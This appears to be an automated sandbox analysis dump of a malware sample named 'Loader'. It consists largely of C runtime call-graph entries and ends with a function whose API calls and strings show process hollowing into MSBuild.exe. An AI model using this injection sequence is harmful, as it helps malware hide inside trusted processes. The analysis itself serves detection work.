338e04 _Ungetc 29 API calls 18259->18260 18259->18263 18261 3321dd 18260->18261 18282 33d580 18261->18282 18263->18252 18264 338e04 18263->18264 18265 338e10 18264->18265 18266 338e25 18264->18266 18267 3312d4 __strnicoll 14 API calls 18265->18267 18355->18257 18356->18242 20280 328b10 20281 328b4e 20280->20281 20282 328b19 20280->20282 20282->20281 20285 3320e7 20282->20285 20284 328b41 20286 3320f9 20285->20286 20290 332102 ___scrt_uninitialize_crt 20285->20290 20287 332265 ___scrt_uninitialize_crt 68 API calls 20286->20287 20288 3320ff 20287->20288 20288->20284 20289 332111 20289->20284 20290->20289 20293 3323ea 20290->20293 20294 3323f6 ___scrt_is_nonwritable_in_current_image 20293->20294 20301 32d0ff EnterCriticalSection 20294->20301 20296 332404 20297 332143 ___scrt_uninitialize_crt 68 API calls 20296->20297 20298 332415 20297->20298 20302 33243e 20298->20302 20301->20296 20305 32d113 LeaveCriticalSection 20302->20305 20304 332138 20304->20284 20305->20304 19073 32d200 19074 33213a ___scrt_uninitialize_crt 68 API calls 19073->19074 19075 32d208 19074->19075 19083 337eb2 19075->19083 19077 32d20d 19093 337f5d 19077->19093 19080 32d237 19081 335677 ___free_lconv_mon 14 API calls 19080->19081 19082 32d242 19081->19082 19084 337ebe ___scrt_is_nonwritable_in_current_image 19083->19084 19097 331cd1 EnterCriticalSection 19084->19097 19086 337ec9 19087 337f35 19086->19087 19090 337f09 DeleteCriticalSection 19086->19090 19098 331f92 19086->19098 19102 337f54 19087->19102 19092 335677 ___free_lconv_mon 14 API calls 19090->19092 19092->19086 19094 337f74 19093->19094 19096 32d21c DeleteCriticalSection 19093->19096 19095 335677 ___free_lconv_mon 14 API calls 19094->19095 19094->19096 19095->19096 19096->19077 19096->19080 19097->19086 19099 331fa5 _Fputc 19098->19099 19105 332050 19099->19105 19101 331fb1 _Fputc 19101->19086 19177 331ce8 LeaveCriticalSection 19102->19177 19104 337f41 19104->19077 19106 33205c ___scrt_is_nonwritable_in_current_image 19105->19106 19107 332066 19106->19107 19108 332089 19106->19108 19109 331b68 __strnicoll 29 API calls 19107->19109 19115 332081 19108->19115 19116 32d0ff EnterCriticalSection 19108->19116 19109->19115 19111 3320a7 19117 331fc2 19111->19117 19113 3320b4 19131 3320df 19113->19131 19115->19101 19116->19111 19118 331ff2 19117->19118 19119 331fcf 19117->19119 19121 3321a8 ___scrt_uninitialize_crt 64 API calls 19118->19121 19129 331fea 19118->19129 19120 331b68 __strnicoll 29 API calls 19119->19120 19120->19129 19122 33200a 19121->19122 19123 337f5d 14 API calls 19122->19123 19124 332012 19123->19124 19125 338e04 _Ungetc 29 API calls 19124->19125 19126 33201e 19125->19126 19134 33d0d6 19126->19134 19129->19113 19130 335677 ___free_lconv_mon 14 API calls 19130->19129 19176 32d113 LeaveCriticalSection 19131->19176 19133 3320e5 19133->19115 19135 33d0ff 19134->19135 19140 332025 19134->19140 19136 33d14e 19135->19136 19138 33d126 19135->19138 19137 331b68 __strnicoll 29 API calls 19136->19137 19137->19140 19141 33d179 19138->19141 19140->19129 19140->19130 19142 33d185 ___scrt_is_nonwritable_in_current_image 19141->19142 19149 33cfd8 EnterCriticalSection 19142->19149 19144 33d193 19146 33d1c4 19144->19146 19150 33d036 19144->19150 19163 33d1fe 19146->19163 19149->19144 19151 33cd8f _Fputc 29 API calls 19150->19151 19154 33d046 19151->19154 19152 33d04c 19166 33cdf9 19152->19166 19154->19152 19156 33cd8f _Fputc 29 API calls 19154->19156 19162 33d07e 19154->19162 19155 33cd8f _Fputc 29 API calls 19157 33d08a CloseHandle 19155->19157 19158 33d075 19156->19158 19157->19152 19159 33d096 GetLastError 19157->19159 19160 33cd8f _Fputc 29 API calls 19158->19160 19159->19152 19160->19162 19161 33d0a4 _Fputc 19161->19146 19162->19152 19162->19155 19175 33cffb LeaveCriticalSection 19163->19175 19165 33d1e7 19165->19140 19167 33ce08 19166->19167 19168 33ce6f 19166->19168 19167->19168 19174 33ce32 19167->19174 19169 3312d4 __strnicoll 14 API calls 19168->19169 19170 33ce74 19169->19170 19171 3312e7 __dosmaperr 14 API calls 19170->19171 19172 33ce5f 19171->19172 19172->19161 19173 33ce59 SetStdHandle 19173->19172 19174->19172 19174->19173 19175->19165 19176->19133 19177->19104 19020 337001 19021 33701c ___scrt_is_nonwritable_in_current_image 19020->19021 19032 331cd1 EnterCriticalSection 19021->19032 19023 337023 19033 33cf3a 19023->19033 19026 337041 19052 337067 19026->19052 19031 337152 2 API calls 19031->19026 19032->19023 19034 33cf46 ___scrt_is_nonwritable_in_current_image 19033->19034 19035 33cf70 19034->19035 19036 33cf4f 19034->19036 19055 331cd1 EnterCriticalSection 19035->19055 19037 3312d4 __strnicoll 14 API calls 19036->19037 19039 33cf54 19037->19039 19040 3319bf __strnicoll 29 API calls 19039->19040 19041 337032 19040->19041 19041->19026 19046 33709c GetStartupInfoW 19041->19046 19042 33cfa8 19063 33cfcf 19042->19063 19044 33cf7c 19044->19042 19056 33ce8a 19044->19056 19047 33703c 19046->19047 19048 3370b9 19046->19048 19047->19031 19048->19047 19049 33cf3a 30 API calls 19048->19049 19050 3370e1 19049->19050 19050->19047 19051 337111 GetFileType 19050->19051 19051->19050 19072 331ce8 LeaveCriticalSection 19052->19072 19054 337052 19055->19044 19057 3369b4 __strnicoll 14 API calls 19056->19057 19058 33ce9c 19057->19058 19062 33cea9 19058->19062 19066 336430 19058->19066 19059 335677 ___free_lconv_mon 14 API calls 19061 33cefe 19059->19061 19061->19044 19062->19059 19071 331ce8 LeaveCriticalSection 19063->19071 19065 33cfd6 19065->19041 19067 3366cd std::_Locinfo::_Locinfo_dtor 5 API calls 19066->19067 19068 33644c 19067->19068 19069 33646a InitializeCriticalSectionAndSpinCount 19068->19069 19070 336455 19068->19070 19069->19070 19070->19058 19071->19065 19072->19054 19332 328660 19333 32867b 19332->19333 19335 32868d 19333->19335 19336 328051 19333->19336 19339 333a4e 19336->19339 19340 333a5a ___scrt_is_nonwritable_in_current_image 19339->19340 19341 333a61 19340->19341 19342 333a78 19340->19342 19343 3312d4 __strnicoll 14 API calls 19341->19343 19352 32d0ff EnterCriticalSection 19342->19352 19345 333a66 19343->19345 19347 3319bf __strnicoll 29 API calls 19345->19347 19346 333a87 19353 333acc 19346->19353 19351 328063 19347->19351 19349 333a95 19367 333ac4 19349->19367 19351->19335 19352->19346 19354 333ae2 19353->19354 19355 333b6c _Ungetc 19353->19355 19354->19355 19356 333b10 19354->19356 19370 33f3cf 19354->19370 19355->19349 19356->19355 19358 338e04 _Ungetc 29 API calls 19356->19358 19359 333b22 19358->19359 19360 333b45 19359->19360 19361 338e04 _Ungetc 29 API calls 19359->19361 19360->19355 19375 333b82 19360->19375 19362 333b2e 19361->19362 19362->19360 19364 338e04 _Ungetc 29 API calls 19362->19364 19365 333b3a 19364->19365 19366 338e04 _Ungetc 29 API calls 19365->19366 19366->19360 19402 32d113 LeaveCriticalSection 19367->19402 19369 333aca 19369->19351 19371 3369b4 __strnicoll 14 API calls 19370->19371 19372 33f3ec 19371->19372 19373 335677 ___free_lconv_mon 14 API calls 19372->19373 19374 33f3f6 19373->19374 19374->19356 19376 338e04 _Ungetc 29 API calls 19375->19376 19377 333ba5 19376->19377 19378 333bce 19377->19378 19379 338e04 _Ungetc 29 API calls 19377->19379 19384 333c08 19378->19384 19388 338af6 19378->19388 19380 333bb3 19379->19380 19380->19378 19382 338e04 _Ungetc 29 API calls 19380->19382 19383 333bc1 19382->19383 19385 338e04 _Ungetc 29 API calls 19383->19385 19386 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19384->19386 19385->19378 19387 333c86 19386->19387 19387->19355 19389 338b09 _Fputc 19388->19389 19392 338b30 19389->19392 19391 338b1e _Fputc 19391->19384 19393 338b45 19392->19393 19394 338b86 19393->19394 19395 32d580 _Fputc 39 API calls 19393->19395 19400 338b49 _Fputc std::bad_exception::bad_exception 19393->19400 19401 338b72 std::bad_exception::bad_exception 19393->19401 19397 3357c1 _Fputc WideCharToMultiByte 19394->19397 19394->19400 19394->19401 19395->19394 19396 331b68 __strnicoll 29 API calls 19396->19400 19398 338c41 19397->19398 19399 338c57 GetLastError 19398->19399 19398->19400 19399->19400 19399->19401 19400->19391 19401->19396 19401->19400 19402->19369 20449 328760 20450 32876c __EH_prolog3_GS 20449->20450 20452 3287d8 20450->20452 20453 3287be 20450->20453 20457 328786 20450->20457 20468 33244a 20452->20468 20465 32800d 20453->20465 20492 329d7e 20457->20492 20459 326800 std::ios_base::_Init 29 API calls 20459->20457 20460 328894 20460->20459 20461 3287f7 20461->20460 20462 33244a 45 API calls 20461->20462 20464 3288ce 20461->20464 20488 327b4b 20461->20488 20462->20461 20464->20460 20495 3338e7 20464->20495 20508 332605 20465->20508 20469 332456 ___scrt_is_nonwritable_in_current_image 20468->20469 20470 332460 20469->20470 20471 332478 20469->20471 20472 3312d4 __strnicoll 14 API calls 20470->20472 20771 32d0ff EnterCriticalSection 20471->20771 20474 332465 20472->20474 20476 3319bf __strnicoll 29 API calls 20474->20476 20475 332483 20477 338e04 _Ungetc 29 API calls 20475->20477 20478 33249b 20475->20478 20487 332470 20476->20487 20477->20478 20479 332503 20478->20479 20480 33252b 20478->20480 20482 3312d4 __strnicoll 14 API calls 20479->20482 20772 332563 20480->20772 20484 332508 20482->20484 20483 332531 20782 33255b 20483->20782 20486 3319bf __strnicoll 29 API calls 20484->20486 20486->20487 20487->20461 20489 327b5b 20488->20489 20490 327b7f 20488->20490 20489->20461 20786 328fef 20490->20786 20493 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20492->20493 20494 329d88 20493->20494 20494->20494 20496 3338f3 ___scrt_is_nonwritable_in_current_image 20495->20496 20497 3338fa 20496->20497 20498 33390f 20496->20498 20500 3312d4 __strnicoll 14 API calls 20497->20500 20845 32d0ff EnterCriticalSection 20498->20845 20502 3338ff 20500->20502 20501 333919 20846 33395a 20501->20846 20503 3319bf __strnicoll 29 API calls 20502->20503 20506 33390a 20503->20506 20506->20464 20509 332611 ___scrt_is_nonwritable_in_current_image 20508->20509 20510 332618 20509->20510 20511 33262f 20509->20511 20512 3312d4 __strnicoll 14 API calls 20510->20512 20521 32d0ff EnterCriticalSection 20511->20521 20514 33261d 20512->20514 20517 3319bf __strnicoll 29 API calls 20514->20517 20515 33263b 20522 33267c 20515->20522 20519 328018 20517->20519 20519->20457 20521->20515 20523 332699 20522->20523 20524 3326ff 20522->20524 20525 338e04 _Ungetc 29 API calls 20523->20525 20526 3327c6 20524->20526 20527 338e04 _Ungetc 29 API calls 20524->20527 20529 33269f 20525->20529 20558 332646 20526->20558 20577 33de3e 20526->20577 20530 332714 20527->20530 20528 3326c2 20528->20524 20544 3326dd 20528->20544 20529->20528 20532 338e04 _Ungetc 29 API calls 20529->20532 20533 332737 20530->20533 20535 338e04 _Ungetc 29 API calls 20530->20535 20534 3326ab 20532->20534 20533->20526 20536 33274e 20533->20536 20534->20528 20540 338e04 _Ungetc 29 API calls 20534->20540 20538 332720 20535->20538 20537 33259f 43 API calls 20536->20537 20539 332757 20537->20539 20538->20533 20543 338e04 _Ungetc 29 API calls 20538->20543 20545 32d27f __Getctype 39 API calls 20539->20545 20539->20558 20542 3326b7 20540->20542 20546 338e04 _Ungetc 29 API calls 20542->20546 20547 33272c 20543->20547 20544->20558 20562 33259f 20544->20562 20548 33276f 20545->20548 20546->20528 20549 338e04 _Ungetc 29 API calls 20547->20549 20550 332799 20548->20550 20551 33259f 43 API calls 20548->20551 20549->20533 20573 338c9a 20550->20573 20553 332780 20551->20553 20553->20550 20555 332786 20553->20555 20554 3327ad 20556 3312d4 __strnicoll 14 API calls 20554->20556 20554->20558 20557 3338e7 31 API calls 20555->20557 20556->20558 20557->20558 20559 332674 20558->20559 20770 32d113 LeaveCriticalSection 20559->20770 20561 33267a 20561->20519 20563 332563 20562->20563 20564 33256f 20563->20564 20567 332584 20563->20567 20565 3312d4 __strnicoll 14 API calls 20564->20565 20568 332574 20565->20568 20566 332593 20566->20544 20567->20566 20598 33de33 20567->20598 20570 3319bf __strnicoll 29 API calls 20568->20570 20572 33257f 20570->20572 20572->20544 20574 338cad _Fputc 20573->20574 20751 338cd1 20574->20751 20576 338cbf _Fputc 20576->20554 20578 33dfd8 20577->20578 20579 33dfe7 20578->20579 20583 33dffc 20578->20583 20580 3312d4 __strnicoll 14 API calls 20579->20580 20581 33dfec 20580->20581 20582 3319bf __strnicoll 29 API calls 20581->20582 20592 33dff7 20582->20592 20584 33e05a 20583->20584 20585 33f3cf _Ungetc 14 API calls 20583->20585 20583->20592 20586 338e04 _Ungetc 29 API calls 20584->20586 20585->20584 20587 33e08a 20586->20587 20588 342d43 43 API calls 20587->20588 20589 33e092 20588->20589 20590 338e04 _Ungetc 29 API calls 20589->20590 20589->20592 20591 33e0cc 20590->20591 20591->20592 20593 338e04 _Ungetc 29 API calls 20591->20593 20592->20558 20594 33e0da 20593->20594 20594->20592 20595 338e04 _Ungetc 29 API calls 20594->20595 20596 33e0e8 20595->20596 20597 338e04 _Ungetc 29 API calls 20596->20597 20597->20592 20599 33de49 20598->20599 20600 33de56 20599->20600 20601 33de6e 20599->20601 20602 3312d4 __strnicoll 14 API calls 20600->20602 20605 33decd 20601->20605 20606 33f3cf _Ungetc 14 API calls 20601->20606 20613 332590 20601->20613 20603 33de5b 20602->20603 20604 3319bf __strnicoll 29 API calls 20603->20604 20604->20613 20607 338e04 _Ungetc 29 API calls 20605->20607 20606->20605 20608 33dee6 20607->20608 20619 342d43 20608->20619 20611 338e04 _Ungetc 29 API calls 20612 33df1f 20611->20612 20612->20613 20614 338e04 _Ungetc 29 API calls 20612->20614 20613->20544 20615 33df2d 20614->20615 20615->20613 20616 338e04 _Ungetc 29 API calls 20615->20616 20617 33df3b 20616->20617 20618 338e04 _Ungetc 29 API calls 20617->20618 20618->20613 20620 342d4f ___scrt_is_nonwritable_in_current_image 20619->20620 20621 342d57 20620->20621 20624 342d72 20620->20624 20622 3312e7 __dosmaperr 14 API calls 20621->20622 20623 342d5c 20622->20623 20626 3312d4 __strnicoll 14 API calls 20623->20626 20625 342d89 20624->20625 20628 342dc4 20624->20628 20627 3312e7 __dosmaperr 14 API calls 20625->20627 20648 33deee 20626->20648 20631 342d8e 20627->20631 20629 342de2 20628->20629 20630 342dcd 20628->20630 20649 33cfd8 EnterCriticalSection 20629->20649 20632 3312e7 __dosmaperr 14 API calls 20630->20632 20634 3312d4 __strnicoll 14 API calls 20631->20634 20635 342dd2 20632->20635 20637 342d96 20634->20637 20638 3312d4 __strnicoll 14 API calls 20635->20638 20636 342de8 20639 342e07 20636->20639 20640 342e1c 20636->20640 20642 3319bf __strnicoll 29 API calls 20637->20642 20638->20637 20641 3312d4 __strnicoll 14 API calls 20639->20641 20650 342e5c 20640->20650 20644 342e0c 20641->20644 20642->20648 20646 3312e7 __dosmaperr 14 API calls 20644->20646 20645 342e17 20713 342e54 20645->20713 20646->20645 20648->20611 20648->20613 20649->20636 20651 342e86 20650->20651 20652 342e6e 20650->20652 20654 3431c8 20651->20654 20659 342ec9 20651->20659 20653 3312e7 __dosmaperr 14 API calls 20652->20653 20655 342e73 20653->20655 20656 3312e7 __dosmaperr 14 API calls 20654->20656 20657 3312d4 __strnicoll 14 API calls 20655->20657 20658 3431cd 20656->20658 20662 342e7b 20657->20662 20660 3312d4 __strnicoll 14 API calls 20658->20660 20661 342ed4 20659->20661 20659->20662 20667 342f04 20659->20667 20663 342ee1 20660->20663 20664 3312e7 __dosmaperr 14 API calls 20661->20664 20662->20645 20668 3319bf __strnicoll 29 API calls 20663->20668 20665 342ed9 20664->20665 20666 3312d4 __strnicoll 14 API calls 20665->20666 20666->20663 20669 342f1d 20667->20669 20670 342f58 20667->20670 20671 342f2a 20667->20671 20668->20662 20669->20671 20675 342f46 20669->20675 20673 3356b1 __strnicoll 15 API calls 20670->20673 20672 3312e7 __dosmaperr 14 API calls 20671->20672 20674 342f2f 20672->20674 20676 342f69 20673->20676 20677 3312d4 __strnicoll 14 API calls 20674->20677 20716 34017f 20675->20716 20679 335677 ___free_lconv_mon 14 API calls 20676->20679 20680 342f36 20677->20680 20683 342f72 20679->20683 20684 3319bf __strnicoll 29 API calls 20680->20684 20681 3430a4 20682 343118 20681->20682 20685 3430bd GetConsoleMode 20681->20685 20687 34311c ReadFile 20682->20687 20686 335677 ___free_lconv_mon 14 API calls 20683->20686 20712 342f41 20684->20712 20685->20682 20688 3430ce 20685->20688 20689 342f79 20686->20689 20690 343134 20687->20690 20691 343190 GetLastError 20687->20691 20688->20687 20693 3430d4 ReadConsoleW 20688->20693 20694 342f83 20689->20694 20695 342f9e 20689->20695 20690->20691 20692 34310d 20690->20692 20696 3430f4 20691->20696 20697 34319d 20691->20697 20707 343170 20692->20707 20708 343159 20692->20708 20692->20712 20693->20692 20700 3430ee GetLastError 20693->20700 20702 3312d4 __strnicoll 14 API calls 20694->20702 20699 33c0d2 31 API calls 20695->20699 20704 3312fa __dosmaperr 14 API calls 20696->20704 20696->20712 20698 3312d4 __strnicoll 14 API calls 20697->20698 20703 3431a2 20698->20703 20699->20675 20700->20696 20701 335677 ___free_lconv_mon 14 API calls 20701->20662 20705 342f88 20702->20705 20706 3312e7 __dosmaperr 14 API calls 20703->20706 20704->20712 20709 3312e7 __dosmaperr 14 API calls 20705->20709 20706->20712 20707->20712 20738 343509 20707->20738 20725 343265 20708->20725 20709->20712 20712->20701 20750 33cffb LeaveCriticalSection 20713->20750 20715 342e5a 20715->20648 20717 34018c 20716->20717 20718 340199 20716->20718 20719 3312d4 __strnicoll 14 API calls 20717->20719 20720 3401a5 20718->20720 20721 3312d4 __strnicoll 14 API calls 20718->20721 20722 340191 20719->20722 20720->20681 20723 3401c6 20721->20723 20722->20681 20724 3319bf __strnicoll 29 API calls 20723->20724 20724->20722 20744 3433bc 20725->20744 20727 3356ff __strnicoll MultiByteToWideChar 20729 343379 20727->20729 20732 343382 GetLastError 20729->20732 20735 3432ad 20729->20735 20730 343307 20736 3432c1 20730->20736 20737 33c0d2 31 API calls 20730->20737 20731 3432f7 20733 3312d4 __strnicoll 14 API calls 20731->20733 20734 3312fa __dosmaperr 14 API calls 20732->20734 20733->20735 20734->20735 20735->20712 20736->20727 20737->20736 20739 343543 20738->20739 20740 3435d9 ReadFile 20739->20740 20741 3435d4 20739->20741 20740->20741 20742 3435f6 20740->20742 20741->20712 20742->20741 20743 33c0d2 31 API calls 20742->20743 20743->20741 20745 3433f0 20744->20745 20746 34327c 20745->20746 20747 343461 ReadFile 20745->20747 20746->20730 20746->20731 20746->20735 20746->20736 20747->20746 20748 34347a 20747->20748 20748->20746 20749 33c0d2 31 API calls 20748->20749 20749->20746 20750->20715 20752 338ce5 20751->20752 20760 338cf5 20751->20760 20753 338d1a 20752->20753 20754 32d580 _Fputc 39 API calls 20752->20754 20752->20760 20755 338d2b 20753->20755 20756 338d4e 20753->20756 20754->20753 20763 341cc2 20755->20763 20758 338d76 20756->20758 20759 338dca 20756->20759 20756->20760 20758->20760 20762 3356ff __strnicoll MultiByteToWideChar 20758->20762 20761 3356ff __strnicoll MultiByteToWideChar 20759->20761 20760->20576 20761->20760 20762->20760 20766 343e63 20763->20766 20769 343e91 _Fputc 20766->20769 20767 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20768 341cdd 20767->20768 20768->20760 20769->20767 20770->20561 20771->20475 20773 33256f 20772->20773 20776 332584 20772->20776 20774 3312d4 __strnicoll 14 API calls 20773->20774 20777 332574 20774->20777 20775 332593 20775->20483 20776->20775 20778 33de33 43 API calls 20776->20778 20779 3319bf __strnicoll 29 API calls 20777->20779 20780 332590 20778->20780 20781 33257f 20779->20781 20780->20483 20781->20483 20785 32d113 LeaveCriticalSection 20782->20785 20784 332561 20784->20487 20785->20784 20787 3290a3 20786->20787 20788 329013 20786->20788 20808 325770 20787->20808 20797 325810 20788->20797 20794 329030 _Yarn 20795 322310 std::ios_base::_Init 29 API calls 20794->20795 20796 329071 _Yarn 20794->20796 20795->20796 20796->20489 20799 32583e std::ios_base::_Init 20797->20799 20798 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20800 32589d 20798->20800 20799->20798 20801 322ae0 20800->20801 20802 322af3 20801->20802 20803 322aff 20801->20803 20802->20794 20804 322b1f 20803->20804 20805 322b0c 20803->20805 20819 322bf0 20804->20819 20811 322b80 20805->20811 20831 327934 20808->20831 20812 322ba3 20811->20812 20813 322b9e 20811->20813 20814 322bf0 std::ios_base::_Init 3 API calls 20812->20814 20822 322c10 20813->20822 20816 322bae 20814->20816 20817 322bbb 20816->20817 20826 3319cf 20816->20826 20817->20802 20820 327113 std::ios_base::_Init 3 API calls 20819->20820 20821 322c02 20820->20821 20821->20802 20823 322c28 std::ios_base::_Init 20822->20823 20824 32a41c Concurrency::cancel_current_task RaiseException 20823->20824 20825 322c3d 20824->20825 20827 331c0e __strnicoll 29 API calls 20826->20827 20828 3319de 20827->20828 20829 3319ec __Getctype 11 API calls 20828->20829 20830 3319eb 20829->20830 20836 3279cd 20831->20836 20834 32a41c Concurrency::cancel_current_task RaiseException 20835 327953 20834->20835 20839 326780 20836->20839 20840 3267c1 std::bad_exception::bad_exception 20839->20840 20841 32aa1d ___std_exception_copy 29 API calls 20840->20841 20842 3267e0 20841->20842 20843 327191 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20842->20843 20844 3267ea 20843->20844 20844->20834 20845->20501 20847 333972 20846->20847 20849 3339e2 20846->20849 20848 338e04 _Ungetc 29 API calls 20847->20848 20853 333978 20848->20853 20850 33f3cf _Ungetc 14 API calls 20849->20850 20852 333927 20849->20852 20850->20852 20851 3339ca 20854 3312d4 __strnicoll 14 API calls 20851->20854 20857 333952 20852->20857 20853->20849 20853->20851 20855 3339cf 20854->20855 20856 3319bf __strnicoll 29 API calls 20855->20856 20856->20852 20860 32d113 LeaveCriticalSection 20857->20860 20859 333958 20859->20506 20860->20859 20868 328950 20869 328964 20868->20869 20870 328bb5 69 API calls 20869->20870 20875 3289bf 20869->20875 20871 32898f 20870->20871 20872 3289ac 20871->20872 20873 331384 67 API calls 20871->20873 20871->20875 20872->20875 20876 3325aa 20872->20876 20873->20872 20877 3325b5 20876->20877 20878 3325ca 20876->20878 20879 3312d4 __strnicoll 14 API calls 20877->20879 20880 3325d2 20878->20880 20881 3325e7 20878->20881 20882 3325ba 20879->20882 20883 3312d4 __strnicoll 14 API calls 20880->20883 20890 33c2f6 20881->20890 20885 3319bf __strnicoll 29 API calls 20882->20885 20886 3325d7 20883->20886 20888 3325c5 20885->20888 20889 3319bf __strnicoll 29 API calls 20886->20889 20887 3325e2 20887->20875 20888->20875 20889->20887 20891 33c30a _Fputc 20890->20891 20894 33c89f 20891->20894 20893 33c316 _Fputc 20893->20887 20895 33c8ab ___scrt_is_nonwritable_in_current_image 20894->20895 20896 33c8b2 20895->20896 20897 33c8d5 20895->20897 20898 331b68 __strnicoll 29 API calls 20896->20898 20905 32d0ff EnterCriticalSection 20897->20905 20900 33c8cb 20898->20900 20900->20893 20901 33c8e3 20906 33c6fe 20901->20906 20903 33c8f2 20919 33c924 20903->20919 20905->20901 20907 33c735 20906->20907 20908 33c70d 20906->20908 20910 338e04 _Ungetc 29 API calls 20907->20910 20909 331b68 __strnicoll 29 API calls 20908->20909 20911 33c728 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20909->20911 20912 33c73e 20910->20912 20911->20903 20913 33c130 33 API calls 20912->20913 20915 33c75c 20913->20915 20914 33c7ff 20914->20911 20918 33c533 33 API calls 20914->20918 20915->20911 20915->20914 20916 33c7e8 20915->20916 20917 33c388 34 API calls 20916->20917 20917->20911 20918->20911 20922 32d113 LeaveCriticalSection 20919->20922 20921 33c92c 20921->20900 20922->20921 19889 328ab0 19890 328abf 19889->19890 19892 328ae3 19890->19892 19893 33300b 19890->19893 19894 33301e _Fputc 19893->19894 19897 333078 19894->19897 19896 333033 _Fputc 19896->19892 19898 33308a 19897->19898 19900 3330ad 19897->19900 19899 331b68 __strnicoll 29 API calls 19898->19899 19901 3330a5 19899->19901 19900->19898 19902 3330d4 19900->19902 19901->19896 19905 3331ae 19902->19905 19906 3331ba ___scrt_is_nonwritable_in_current_image 19905->19906 19913 32d0ff EnterCriticalSection 19906->19913 19908 3331c8 19914 33310e 19908->19914 19910 3331d5 19923 3331fd 19910->19923 19913->19908 19915 3321a8 ___scrt_uninitialize_crt 64 API calls 19914->19915 19916 333129 19915->19916 19917 337f5d 14 API calls 19916->19917 19918 333133 19917->19918 19919 3369b4 __strnicoll 14 API calls 19918->19919 19920 33314e 19918->19920 19921 333172 19919->19921 19920->19910 19922 335677 ___free_lconv_mon 14 API calls 19921->19922 19922->19920 19926 32d113 LeaveCriticalSection 19923->19926 19925 33310c 19925->19896 19926->19925 21093 335bb0 21094 335bbb 21093->21094 21098 335bcb 21093->21098 21099 335cb5 21094->21099 21097 335677 ___free_lconv_mon 14 API calls 21097->21098 21100 335cd0 21099->21100 21101 335cca 21099->21101 21103 335677 ___free_lconv_mon 14 API calls 21100->21103 21102 335677 ___free_lconv_mon 14 API calls 21101->21102 21102->21100 21104 335cdc 21103->21104 21105 335677 ___free_lconv_mon 14 API calls 21104->21105 21106 335ce7 21105->21106 21107 335677 ___free_lconv_mon 14 API calls 21106->21107 21108 335cf2 21107->21108 21109 335677 ___free_lconv_mon 14 API calls 21108->21109 21110 335cfd 21109->21110 21111 335677 ___free_lconv_mon 14 API calls 21110->21111 21112 335d08 21111->21112 21113 335677 ___free_lconv_mon 14 API calls 21112->21113 21114 335d13 21113->21114 21115 335677 ___free_lconv_mon 14 API calls 21114->21115 21116 335d1e 21115->21116 21117 335677 ___free_lconv_mon 14 API calls 21116->21117 21118 335d29 21117->21118 21119 335677 ___free_lconv_mon 14 API calls 21118->21119 21120 335d37 21119->21120 21125 335e2e 21120->21125 21126 335e3a ___scrt_is_nonwritable_in_current_image 21125->21126 21141 331cd1 EnterCriticalSection 21126->21141 21130 335e44 21131 335677 ___free_lconv_mon 14 API calls 21130->21131 21132 335e6e 21130->21132 21131->21132 21142 335e8d 21132->21142 21133 335e99 21134 335ea5 ___scrt_is_nonwritable_in_current_image 21133->21134 21146 331cd1 EnterCriticalSection 21134->21146 21136 335eaf 21137 335bd1 __strnicoll 14 API calls 21136->21137 21138 335ec2 21137->21138 21147 335ee2 21138->21147 21141->21130 21145 331ce8 LeaveCriticalSection 21142->21145 21144 335d5d 21144->21133 21145->21144 21146->21136 21150 331ce8 LeaveCriticalSection 21147->21150 21149 335bc3 21149->21097 21150->21149 18357 35019e 18358 3501d4 18357->18358 18358->18358 18359 350321 GetPEB 18358->18359 18360 350333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 18358->18360 18359->18360 18360->18358 18361 3503da WriteProcessMemory 18360->18361 18362 35041f 18361->18362 18363 350424 WriteProcessMemory 18362->18363 18364 350461 WriteProcessMemory Wow64SetThreadContext ResumeThread 18362->18364 18363->18362 21412 3375c0 21415 331ce8 LeaveCriticalSection 21412->21415 21414 3375c7 21415->21414

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00350110,00350100), ref: 00350334
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00350347
                                                                                          • Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 00350365
                                                                                          • ReadProcessMemory.KERNELBASE(0000008C,?,00350154,00000004,00000000), ref: 00350389
                                                                                          • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 003503B4
                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 0035040C
                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 00350457
                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 00350495
                                                                                          • Wow64SetThreadContext.KERNEL32(00000094,029D0000), ref: 003504D1
                                                                                          • ResumeThread.KERNELBASE(00000094), ref: 003504E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2037940750.0000000000350000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2037428148.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037879342.0000000000321000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2037914923.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038010974.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038086768.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038250351.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                          • API String ID: 2687962208-3857624555
